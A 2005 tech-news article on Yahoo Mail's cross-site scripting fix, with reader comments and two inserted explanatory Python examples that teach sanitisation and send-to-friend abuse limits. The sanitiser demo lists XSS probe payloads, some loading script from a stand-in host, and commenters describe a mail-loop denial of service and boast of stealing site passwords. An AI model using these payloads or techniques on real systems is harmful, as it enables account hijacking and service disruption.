October 21, 2005 5:19 PM PDT

Yahoo fixes Web mail security flaw

  • 22 comments
Yahoo has fixed a security flaw in its free Web-based e-mail service that opened the door to phishing scams, account hijacks and other attacks.

The flaw, a cross-site scripting vulnerability, existed because Yahoo Mail's filtering failed to detect certain script tags when they were combined with certain special characters, so script supplied by an attacker could run in the context of a victim's Yahoo Mail session, according to SEC Consult, which issued an advisory on the flaw Friday.
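The advisory's wording (script tags slipping past the filter when combined with special characters) describes the classic failure of blacklist sanitisation: the filter strips the exact strings it knows about, and a browser happily parses everything it missed. The following added example is not Yahoo's code and does not reproduce the SEC Consult bypass, which the article does not detail. It contrasts a constructed tag-stripping filter with an allow-list sanitiser built on Python's standard-library html.parser, using constructed probe messages; the allowed tag set, the href rule and the probes are all assumptions chosen for the illustration.

```python
import html
import re
from html.parser import HTMLParser

# ---- The fragile approach: a blacklist that strips the tags it recognises ----
# Constructed illustration of the flaw class in the advisory. Not Yahoo's code.
BARE_SCRIPT_TAG = re.compile(r"<\s*/?\s*script\s*>", re.IGNORECASE)

def blacklist_strip(body: str) -> str:
    """Remove bare <script> and </script> tags and nothing else."""
    return BARE_SCRIPT_TAG.sub("", body)

# ---- The robust approach: allow-list tags/attributes, escape all text ----
ALLOWED_TAGS = {"p", "b", "i", "br", "a"}        # assumed policy for the demo
ALLOWED_ATTRS = {"a": {"href"}}
VOID_TAGS = {"br"}
SAFE_HREF = re.compile(r"^https?://", re.IGNORECASE)

class AllowListSanitiser(HTMLParser):
    """Re-emit only allow-listed markup; everything else becomes plain text."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return                                   # unknown tag: dropped
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue                             # onerror=, style=, ... never pass
            if name == "href" and not SAFE_HREF.match(value or ""):
                continue                             # javascript:, data:, vbscript:
            kept.append(' %s="%s"' % (name, html.escape(value or "", quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        self.out.append(html.escape(data))           # text can never become markup

def allowlist_sanitise(body: str) -> str:
    parser = AllowListSanitiser()
    parser.feed(body)
    parser.close()
    return "".join(parser.out)

# Constructed probe messages: each executes script in a browser, but only the
# first one matches the blacklist regex above.
PROBES = [
    '<script>alert(1)</script>',
    '<script src="//evil.example/x.js"></script>',   # attribute defeats the regex
    '<script/src="//evil.example/x.js">',            # '/' instead of whitespace
    '<scr<script>ipt>alert(1)</script>',             # tag reassembles after one pass
    '<img src=x onerror="alert(1)">',                # no script tag at all
]

SCRIPT_MARKER = re.compile(r"<\s*script|\son[a-z]+\s*=", re.IGNORECASE)

def still_scriptable(fragment: str) -> bool:
    """Demo heuristic (not a browser): does an executable element survive?"""
    return bool(SCRIPT_MARKER.search(fragment))

def compare(probes=PROBES):
    """(survives blacklist, survives allow-list) for each probe."""
    return [(still_scriptable(blacklist_strip(p)),
             still_scriptable(allowlist_sanitise(p))) for p in probes]

if __name__ == "__main__":
    for probe, (weak, strong) in zip(PROBES, compare()):
        print("%-48r blacklist=%s allowlist=%s" % (
            probe, "BYPASSED" if weak else "caught", "BYPASSED" if strong else "caught"))
```

The allow-list version never tries to recognise "bad" input; it only ever re-emits markup it constructed itself from a fixed vocabulary and HTML-escapes every character of text, so a new tag spelling or an unexpected special character cannot produce anything a browser will execute.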

Cross-site scripting flaws are found regularly; recent examples include Google's Web site and, earlier this year, Microsoft's Xbox 360 site.

Yahoo's site has been affected before as well. An attacker could exploit this type of flaw to hijack user accounts, launch information-stealing phishing scams or even download malicious code onto users' computers, experts have said.

A Yahoo representative said the company fixed the most recent flaws in the "last few weeks" and that its users are protected.

"Yahoo recently learned of an issue in Yahoo Mail and worked immediately to begin rollout of a server-side fix which does not require users to take any action," said Karen Mahon, a Yahoo spokeswoman. "We are unaware of any users who were impacted by this issue."

Yahoo mail?
by Roman12 October 21, 2005 8:00 PM PDT
Reading this article made me realize that I do not know anybody who still has a Yahoo email address. Before, it was very popular, but now you rarely ever see anyone with @yahoo.com anymore. Most people I know who do not own a domain name either use Hotmail or Gmail nowadays. Has anybody else noticed?
__________________________________
R.K.
http://www.Remove-All-Spyware.com/
I use Yahoo Mail
by m0kume October 21, 2005 9:28 PM PDT
Hotmail gave me too many problems, Gmail - haven't tried it.
Check out this site...
by i_made_this October 22, 2005 8:48 AM PDT
http://www.trustedsource.org
Not true
by sergio_gadaleta October 22, 2005 6:56 PM PDT
The spokeswoman for Yahoo, Karen Mahon, is full of it. I am a primary example of my account being hacked. My Yahoo Mail account was hacked on Monday, Oct. 17, 2005, and I haven't been able to access the account since. I've called Yahoo and e-mailed their security "people" about 50 times (no exaggeration) and they've brushed me off like a fly on a shoulder. I have VITAL information on that account and they don't care. When this is all over with, Yahoo will receive a call from my lawyer. Somebody's gotta pay for the heartburn and sleepless nights I've been through. That e-mail account has information like 401K, IRA, SS#, etc. I hope more people will join me in bringing down that company.
Too bad
by October 24, 2005 3:51 PM PDT
Man, not to insult you, but I'm sure everyone would agree: you should not keep personal information in one source alone, let alone on one free mail server. You should at least have it kept somewhere else, as in on your computer, backed up on a floppy disk or CD, and printed out. It is your fault you lost all that information, because you did not realize that Yahoo and other companies don't care about Joe Schmoe and his free e-mail. As long as you're not paying them for services, why should they help you?
I'm leaving Yahoo
by chartreuse November 14, 2005 4:37 PM PST
I've had problems getting into my mail for over a month and they're brushing me off, too. I'm sick of them and will warn everyone else about them. I think I'll try hotmail.
Yahoo Problems
by EagleoneRojax October 22, 2005 11:01 PM PDT
Well, if you were unaware of problems, let me assure you that there were! Like no mail, or mail that is three days late, or double sendings of the same mail, either at the same time, or the next day, or the next. I would be glad to have others contact you if you wish... just so you can be aware, of course! Thanks for your diligence in making Yahoo a better place to be! Roland
Bigger threat was discovered by me
by n3td3v October 23, 2005 8:29 AM PDT
Part 1====
The biggest security issue for Yahoo Mail was discovered by me and reported to Yahoo and the security community. This involved using Yahoo's own mail-to-friend servers to bombard Yahoo's entire mail network, both corporate and consumer side, I believe. This allowed an attacker to create a DDoS situation where mail servers would slow to a crawl, if not suffer outages. This is because the mail-to-friend servers allowed for a loop. This allowed a malicious user to send messages out from Yahoo's own production servers. Because these were Yahoo's own mail-to-friend servers, Yahoo's anti-spam technology treated all messages as "trusted". Therefore, all messages went straight to the Yahoo Mail inbox rather than the bulk folder. Apart from this obvious disruption, because all mail was going to the inbox, Yahoo Messenger users would be bombarded with multiple new-mail alert dialog boxes. This was a multi-attack, which would have brought widespread disruption to Yahoo Messenger and Yahoo Mail users.

Part 2====
I believe I discovered the first XSS for Google, way before the article CNET recently reported on. I discovered an XSS in Google Groups last December, 2004. This was reported to the Full-Disclosure mailing list and Google's security team. The vulnerability was reported on the Friday to the security community and patched by Google by Sunday night.

Part 3====
It would be great if you could start acknowledging people where credit is due. The real security research for Yahoo and Google is going on by people like me, not the folks coming from these security companies. I am bored with online media outlets only reporting on something if its discovered by "professional security" companies.

All the above can be verified using a search engine or by contacting the Google and Yahoo security teams. I continue to work in the underground to find unique ways to compromise security that haven't been previously thought of. The guys at these security companies aren't finding flaws which aren't based on known methods. I, however, believe I am going beyond that. See the described Y Mail vulnerability and the way I used Yahoo to attack Yahoo, rather than attacking from external machines. Yahoo is still vulnerable to attacks using its own production servers. However, the YMail/YMessenger hack described was patched!
great
by October 24, 2005 3:48 PM PDT
That is great, man. I used to be in the underground and was doing the exact same as you. I have found different vulnerabilities in smaller companies... just login problems, where the site creators were stupid: all I had to do was go to the source code, look for the file containing passwords, and access it, and I got everyone's username and password, including the webmaster's.
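The abuse pattern n3td3v describes in the comment above, a first-party "mail this to a friend" feature whose output is trusted by the same provider's spam filter and can be looped or fanned out without limit, is a general one, and the defence is the same whether or not the specific Yahoo claim is accurate. The following added example is not Yahoo's code and is not based on any detail of Yahoo's systems; it is a constructed abuse guard for such an endpoint, with assumed limits, an assumed service mailbox address and an assumed header name. It goes beyond the comment by showing the three controls together: a per-sender sliding-window rate limit, a cap on fan-out, and a refusal to mail the feature's own ingest address, plus marking accepted messages as user-originated so downstream filters score them like any other external mail instead of trusting them.

```python
import time
from collections import defaultdict, deque

# Constructed example; the values below are assumptions for the demo.
SERVICE_ADDRESSES = {"share@example-webmail.com"}  # the feature's own mailbox
MAX_RECIPIENTS = 5                                  # fan-out cap per request
RATE_LIMIT = 10                                     # requests per window, per sender key
RATE_WINDOW = 3600.0                                # seconds

class SendToFriendGuard:
    """Gate a 'mail this to a friend' request before anything is sent."""

    def __init__(self, clock=time.monotonic):
        self.clock = clock
        self.recent = defaultdict(deque)   # sender_key -> accepted request timestamps

    def check(self, sender_key, recipients, now=None):
        """Return (accepted, reason). Only accepted requests count toward the limit."""
        now = self.clock() if now is None else now
        if not recipients:
            return False, "no recipients"
        if len(recipients) > MAX_RECIPIENTS:
            return False, "too many recipients"
        for addr in recipients:
            if addr.strip().lower() in SERVICE_ADDRESSES:
                # Mailing the feature's own address would re-enter the pipeline:
                # the loop the comment describes.
                return False, "recipient is the service itself"
        window = self.recent[sender_key]
        while window and now - window[0] > RATE_WINDOW:
            window.popleft()               # drop timestamps outside the window
        if len(window) >= RATE_LIMIT:
            return False, "rate limit exceeded"
        window.append(now)
        return True, "ok"

def build_envelope(guard, sender_key, recipients, text, now=None):
    """Run the guard and, if it passes, build a message marked as user-originated
    so the provider's own spam filter does not whitelist it as trusted mail."""
    ok, reason = guard.check(sender_key, recipients, now)
    if not ok:
        return None, reason
    return {
        "to": list(recipients),
        "headers": {
            "X-Origin": "user-submitted-form",   # assumed header name
            "Precedence": "bulk",
        },
        "body": text,
    }, "ok"

if __name__ == "__main__":
    guard = SendToFriendGuard()
    key = "ip:203.0.113.5"                         # constructed sender key
    for i in range(12):
        print(i, guard.check(key, ["friend@example.org"]))
    print(guard.check(key, ["share@example-webmail.com"]))
    print(build_envelope(guard, "ip:198.51.100.7", ["b@example.org"], "hello"))
```

The sender key should be whatever identifies the requester most reliably (an authenticated account where there is one, otherwise the client address), and the window is deliberately kept in memory per key rather than globally so that one abuser cannot exhaust the budget for everyone else.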
Yahoo
by Kreative4Jesus October 23, 2005 11:46 AM PDT
I like Yahoo & they have some beneficial Groups, some of which I own & some of which I just belong to.

They have some flaws; I hope they get them taken care of soon. It is not just about security, but about the lack of communication, etc.:

However, here is what has happened to me:
They usually send me a double dose of e-mail.
And just recently, I found out that I was bouncing with some groups that I no longer belong to. I was bouncing in June & I found out about it in October(?); what gives? There was no evidence of this prior, to correct it, & by the time that I was told about it, I no longer belonged to those groups.

My groups that I've tried to upload pictures to: some will upload, while others do not.

I've filled out a request of sorts for help & I get this automated letter after you fill out your complaint, & you feel like you are communicating with a wall, where there is no human on the other side.

I'm sure that I can find other things to complain about. I had something on my mind & right now I'm just an Artist_Drawing_Blanks: LOL

Anyway, how can I get some real help? Does anyone know?

Cyndi